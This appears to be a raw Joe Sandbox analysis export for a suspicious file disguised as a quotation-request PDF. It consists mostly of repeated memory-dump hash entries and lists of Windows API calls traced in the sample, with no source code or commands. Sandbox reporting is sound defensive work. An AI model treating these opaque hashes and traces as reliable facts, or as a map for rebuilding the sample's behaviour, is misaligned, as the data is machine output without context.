                                                                                                                                  • Instruction ID: 7cac767824ef94b3dda3e127a42c9de924f2c5b2cf66712aabc4c37320a3c518
                                                                                                                                  • Opcode Fuzzy Hash: 5330f81973d9ca2ffd4b558910739298f8a716e6622d3060da24e544bf40a32f
                                                                                                                                  • Instruction Fuzzy Hash: 3EC1C074E00219CFDB54DFA5D994BADBBB2BF89301F1080A9D808AB365DB349E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 640cfe3ae51c67dc52568b527bc3afb6d444ee7797663fb3346360d83eab89ae
                                                                                                                                  • Instruction ID: e5b3f3974041cc9b0cd282dbfd5c332148bc6c275fc4477f2b920814151ee014
                                                                                                                                  • Opcode Fuzzy Hash: 640cfe3ae51c67dc52568b527bc3afb6d444ee7797663fb3346360d83eab89ae
                                                                                                                                  • Instruction Fuzzy Hash: 16C1B074E00219CFDB54DFA5D994BADBBB2BF89301F1080A9D808AB365DB349E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 97ba4eec6391cb773503ab9da7a3ed1fbab82b7fa536761daea7576422728b15
                                                                                                                                  • Instruction ID: 1009d9bca36c7095d2ee3f8297359896a712be5979b3a93dc9d443235a2287a2
                                                                                                                                  • Opcode Fuzzy Hash: 97ba4eec6391cb773503ab9da7a3ed1fbab82b7fa536761daea7576422728b15
                                                                                                                                  • Instruction Fuzzy Hash: A6C1B074E00218CFDB54DFA5D994BADBBB2BF89300F1081A9D808AB365DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 14cc2e4be83708f502f4ab5765416476e140fcc5ef8dd679e428a440cd01ac4b
                                                                                                                                  • Instruction ID: 0c4302770ea28693b59728314afedb9096e22ae723ed36247950f96285bacb65
                                                                                                                                  • Opcode Fuzzy Hash: 14cc2e4be83708f502f4ab5765416476e140fcc5ef8dd679e428a440cd01ac4b
                                                                                                                                  • Instruction Fuzzy Hash: 70C1A074E00218CFDB54DFA5D994BADBBB2BF89300F1080A9D808AB365DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: eaa1248e10659254a9fcaddd7510568d5e546c243f9181dcbe267ab0e2bf1048
                                                                                                                                  • Instruction ID: 99e11f2939d719a408f1c3207d0d9f7a8aec96beddaad6acbb404907a20dda27
                                                                                                                                  • Opcode Fuzzy Hash: eaa1248e10659254a9fcaddd7510568d5e546c243f9181dcbe267ab0e2bf1048
                                                                                                                                  • Instruction Fuzzy Hash: AAC1A274E00218CFDB54DFA5D994BADBBB2BF89300F2080A9D409AB365DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9a7f59a7d54d0be0a59f745c40132b930b6662e43e4127d626e44b78dfb81860
                                                                                                                                  • Instruction ID: 77ea6d626698d8f7dc9bab1b3677632862cd0c15e8517c2656e534cef9eae1ce
                                                                                                                                  • Opcode Fuzzy Hash: 9a7f59a7d54d0be0a59f745c40132b930b6662e43e4127d626e44b78dfb81860
                                                                                                                                  • Instruction Fuzzy Hash: E0C1B074E00218CFDB54DFA5D994BADBBB2BF89300F1080A9D808AB365DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a8e59137a47b9cf00ffb8f9247dd6839d55734d81856fa66525cd4e9f1ad4b01
                                                                                                                                  • Instruction ID: 4b8341a460e68487755a3a5e615b19032b78325f34b1c2841fd53693977fa9cf
                                                                                                                                  • Opcode Fuzzy Hash: a8e59137a47b9cf00ffb8f9247dd6839d55734d81856fa66525cd4e9f1ad4b01
                                                                                                                                  • Instruction Fuzzy Hash: 85C1C074E00218CFDB54DFA5C994BADBBB2BF89304F1080A9D808AB365DB349E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d9980dde2a31c82056ae96493ff1614bc9cce0c2933d436a6b02749d429c4f9d
                                                                                                                                  • Instruction ID: 5a260601fc23b2d56341aa56d28553004948e1413248a662763f6ef8d44b4504
                                                                                                                                  • Opcode Fuzzy Hash: d9980dde2a31c82056ae96493ff1614bc9cce0c2933d436a6b02749d429c4f9d
                                                                                                                                  • Instruction Fuzzy Hash: 7BC1B074E00218CFDB54DFA5D994BADBBB2BF89300F1080A9D809AB365DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 39f5748632310bab30fa53f2749a382e4430d2a5a4d76e6f362975102fd59c48
                                                                                                                                  • Instruction ID: 9ae349beced50f2260720816c429711255d91fd19d4fe67b44f554e839a42bb9
                                                                                                                                  • Opcode Fuzzy Hash: 39f5748632310bab30fa53f2749a382e4430d2a5a4d76e6f362975102fd59c48
                                                                                                                                  • Instruction Fuzzy Hash: 26C1BF74E00218CFDB54DFA5D994BADBBB2BF89304F1080A9D808AB365DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0ef9bba39203c50ea85737eb050f7231cb268d09fb3d587da8a73bf48a36a239
                                                                                                                                  • Instruction ID: 1c109ce1020c12d763641a56d54600134488c862ae53a2c735243423259a8897
                                                                                                                                  • Opcode Fuzzy Hash: 0ef9bba39203c50ea85737eb050f7231cb268d09fb3d587da8a73bf48a36a239
                                                                                                                                  • Instruction Fuzzy Hash: B1C1A174E00218CFDB54DFA5D994BADBBB2BF89300F1080A9D809AB365DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d0ceb58eb3882ba86f0cb8f1330d31cd2833ffa1defd9952273609179d87e88a
                                                                                                                                  • Instruction ID: 267a5f519a7a0f3ef49aa3e73420c1aab9850e89b1585b11582167a341710d80
                                                                                                                                  • Opcode Fuzzy Hash: d0ceb58eb3882ba86f0cb8f1330d31cd2833ffa1defd9952273609179d87e88a
                                                                                                                                  • Instruction Fuzzy Hash: E4C1A174E00218CFDB54DFA5D994BADBBB2BF89300F1081A9D808AB365DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1cbf8d6291a6245f1e0ff744b93b0dadd5839fb90fb1a64d8e52c1626377c07c
                                                                                                                                  • Instruction ID: 534f6e81a9476c676d025118529766d360a539a05871a7d4fa25981418380ac4
                                                                                                                                  • Opcode Fuzzy Hash: 1cbf8d6291a6245f1e0ff744b93b0dadd5839fb90fb1a64d8e52c1626377c07c
                                                                                                                                  • Instruction Fuzzy Hash: 9EC1B274E00218CFDB54DFA5D994B9DBBB2BF89310F2080A9D808AB365DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d828ccda2b04ed4abce5452f9cbffd97881b42a74fabf682f29ea1a198172278
                                                                                                                                  • Instruction ID: 989f34b6b965f45e510c778fd2db8f1bce4488f49867d7f158d33199cc5435c6
                                                                                                                                  • Opcode Fuzzy Hash: d828ccda2b04ed4abce5452f9cbffd97881b42a74fabf682f29ea1a198172278
                                                                                                                                  • Instruction Fuzzy Hash: A1C1BF74E00218CFDB54DFA5D994BADBBB2BF89300F1080A9D808AB365DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b0ac70e57fc019ceaa95189adf648de10d058b3b24ec9f911097841c9cc97e5d
                                                                                                                                  • Instruction ID: 2979a642e04a5f3867c12a5f7a5ae735fd7a445d300e7c34eddaa5ee19477159
                                                                                                                                  • Opcode Fuzzy Hash: b0ac70e57fc019ceaa95189adf648de10d058b3b24ec9f911097841c9cc97e5d
                                                                                                                                  • Instruction Fuzzy Hash: B8C1B174E00218CFDB54DFA5D994BADBBB2BF89300F2080A9D408AB365DB359E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  • Instruction ID: 50b2c07c0071f03ac09b62affd66c385401b0d61079fd1ded57cfcc3074cf187
                                                                                                                                  • Opcode Fuzzy Hash: 096882091d3b03f1d52c24a5146ce1198f07ae2b93f25430e8f31fd21b8f37be
                                                                                                                                  • Instruction Fuzzy Hash: D2C1C074E10218CFDB54DFA5D994BADBBB2BF89301F1080A9D808AB365DB349E85CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320521794.0000000037CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37CA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37ca0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a40d23e4bc197a4ba0460c820e43471ba63ee16fb1d5cd4f0bd61658b0d35f8d
                                                                                                                                  • Instruction ID: e039757f02bf1bc9c230fa1ee1ad5fdd3b31ff62454e744d63e3fa99f363b102
                                                                                                                                  • Opcode Fuzzy Hash: a40d23e4bc197a4ba0460c820e43471ba63ee16fb1d5cd4f0bd61658b0d35f8d
                                                                                                                                  • Instruction Fuzzy Hash: 11C1C074E00218CFDB54DFA5D994BADBBB2BF89301F1080A9D808AB365DB349E85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e0c8e83012f0ae7b7e6ad177582e3d4026cd867fce23cde65646a8627c9378c8
                                                                                                                                  • Instruction ID: 32ea54527125102ac8ab83d48d61fc3dfe64fd0107348424f62dbe5afb9c9eff
                                                                                                                                  • Opcode Fuzzy Hash: e0c8e83012f0ae7b7e6ad177582e3d4026cd867fce23cde65646a8627c9378c8
                                                                                                                                  • Instruction Fuzzy Hash: 15A19B74A01228CFDB64DF64C994BDABBB2BF4A301F5085EAD40DA7260DB319E81CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8895aed2e2d03db4fb2b7c755cf5e1e26f66621f419918cebfbea7ee0071aeda
                                                                                                                                  • Instruction ID: 003d7599ead7e600c5792773914fbe7a6bc9a87e69ce115655d4a66f169f2007
                                                                                                                                  • Opcode Fuzzy Hash: 8895aed2e2d03db4fb2b7c755cf5e1e26f66621f419918cebfbea7ee0071aeda
                                                                                                                                  • Instruction Fuzzy Hash: D6519E74A41228CFDB64DF24C894BEAB7B2BB4A305F5085EAD40AA7350DB359E81CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ae96850f3bbc95e20739429d985340be4fd80dc169efaefd6407cd9a2ac9fa90
                                                                                                                                  • Instruction ID: d38b1f2131ad1d25ea7d7f02aa3ffb65dee5fa2233bffa84db6788958f48c183
                                                                                                                                  • Opcode Fuzzy Hash: ae96850f3bbc95e20739429d985340be4fd80dc169efaefd6407cd9a2ac9fa90
                                                                                                                                  • Instruction Fuzzy Hash: 34D06774D846298BCF51DF6898506ECB770AB9A311F0024A5808CA7110D7749A949A56
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                                    • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                                  • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                                  • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                                  • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                                  • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                                  • CloseClipboard.USER32 ref: 00405676
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                  • String ID: {
                                                                                                                                  • API String ID: 590372296-366298937
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C7D
                                                                                                                                  • ShowWindow.USER32(?), ref: 00403C9A
                                                                                                                                  • DestroyWindow.USER32 ref: 00403CAE
                                                                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CCA
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00403CEB
                                                                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CFF
                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403D06
                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00403DB4
                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403DBE
                                                                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403DD8
                                                                                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E29
                                                                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403ECF
                                                                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403EF0
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403F02
                                                                                                                                  • EnableWindow.USER32(?,?), ref: 00403F1D
                                                                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F33
                                                                                                                                  • EnableMenuItem.USER32(00000000), ref: 00403F3A
                                                                                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F52
                                                                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F65
                                                                                                                                  • lstrlenW.KERNEL32(0042D268,?,0042D268,00433F00), ref: 00403F8E
                                                                                                                                  • SetWindowTextW.USER32(?,0042D268), ref: 00403FA2
                                                                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004040D6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 184305955-0
                                                                                                                                  APIs
                                                                                                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404354
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404368
                                                                                                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404385
                                                                                                                                  • GetSysColor.USER32(?), ref: 00404396
                                                                                                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004043A4
                                                                                                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004043B2
                                                                                                                                  • lstrlenW.KERNEL32(?), ref: 004043B7
                                                                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004043C4
                                                                                                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043D9
                                                                                                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404432
                                                                                                                                  • SendMessageW.USER32(00000000), ref: 00404439
                                                                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404464
                                                                                                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004044A7
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004044B5
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044B8
                                                                                                                                  • ShellExecuteW.SHELL32(0000070B,open,00432EA0,00000000,00000000,00000001), ref: 004044CD
                                                                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004044D9
                                                                                                                                  • SetCursor.USER32(00000000), ref: 004044DC
                                                                                                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040450B
                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040451D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                                  • String ID: -B@$N$open
                                                                                                                                  • API String ID: 3615053054-1057335957
                                                                                                                                  • Opcode ID: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                  • Instruction ID: dd3f9e4c49c61f52868447dcb3d39b77a72b713ccf0d54d9464424dd5907340f
                                                                                                                                  • Opcode Fuzzy Hash: 36576130f872884c293bcf5f2af5e47814bd4f236bd745ad96bf50452987c1a6
                                                                                                                                  • Instruction Fuzzy Hash: E87190B1900209BFDB109F61DD89EAA7B69FB84355F00803AFB05BA1D0C778AD51CF98
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                                    • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                                  • lstrcatW.KERNEL32(00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420,00441800,00000000,0043F000), ref: 0040391F
                                                                                                                                  • lstrlenW.KERNEL32(00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75923420), ref: 0040399F
                                                                                                                                  • lstrcmpiW.KERNEL32(00432E98,.exe,00432EA0,?,?,?,00432EA0,00000000,0043F800,00441000,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 004039B2
                                                                                                                                  • GetFileAttributesW.KERNEL32(00432EA0), ref: 004039BD
                                                                                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403A06
